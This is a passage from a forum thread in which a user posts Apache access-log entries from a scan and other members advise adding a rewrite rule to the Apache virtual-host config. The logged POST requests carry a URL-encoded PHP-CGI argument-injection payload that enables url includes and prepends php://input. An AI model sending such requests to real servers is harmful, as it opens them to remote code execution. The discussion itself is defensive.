208.84.156.150 - - [31/Oct/2013:20:15:03 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 319 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:08 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 319 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
Any thoughts?

Also I've got the same question as RandomUsername: Where should we be putting that regexp rule, Ubi?

/Daniel

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 01 Nov 2013, 12:13

My guess is that it is a coincidence. But maybe you are in the same IP range as RandomUsername? These guys will typically run web scans to find vulnerable machines and there may or not be some apparent logic in their jumping from target to target.

The /cgi-bin/ alias is set in the vhost configuration, so that would be the obvious place to put it. You may however choose to create a separate file for this in Apaches conf.d folder, which will put it in the global configuration and stay untouched by future updates from Excito. Do note that the rewrite lines will only work if RewriteEngine is enabled, so they need to be preceded by a line that says "RewriteEngine on".

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 01 Nov 2013, 13:53

the regexp goes into the virtualhost part of the apache config. And indeed, be sure rewriteengine is on.

We should really get a test for this vulneratbility so people can check if they are patched.

Post Reply